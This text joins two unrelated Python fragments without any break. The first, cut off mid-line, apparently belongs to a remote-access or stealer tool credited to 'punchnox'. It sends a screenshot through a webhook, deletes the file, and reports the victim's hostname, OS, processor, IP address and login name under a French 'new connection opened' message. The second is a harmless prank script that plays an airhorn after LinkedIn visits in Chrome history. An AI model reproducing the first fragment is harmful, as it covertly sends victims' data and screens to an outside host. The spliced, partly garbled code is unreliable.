name="screen.png")) os.system("del " + temp + "\\screen.png") hook.send(message) hook.send("```fix\nNouvelle connexion ouverte " + uuidgen + "\nPrefix : " + platform.node() + "\nSystème d'exploitation : " + platform.system() + " " + platform.release() + "\nArch : " + platform.architecture()[0] + "\nNode : " + platform.node() + "\nProcesseur : " + platform.processor() + "\nIp : " + ip + "\nNom de la session : " + os.getlogin() + "\n```\n>>> ***Dev by punchnox***")
@author: Aaron Fehir Objective: to make a script that will play an annoying sound if you have recently browsed a url containing a given string. """ # Libraries ##### from playsound import playsound import browserhistory as bh import re import time # Accessing chrome's browser history chrome = bh.get_browserhistory()["chrome"] # Creata a list of urls that match the pattern provided url_list =[] for i in range(0, len(chrome)): website = chrome [i][0] if re.search(r'(L/L)inked(i|I)n', website): url_list.append(website) # Play an airhorn sound if any results match if len(url_list) > 8: playsound("C:/Users/User/DownLoads/airhorn.wav") else: time.sleep(500)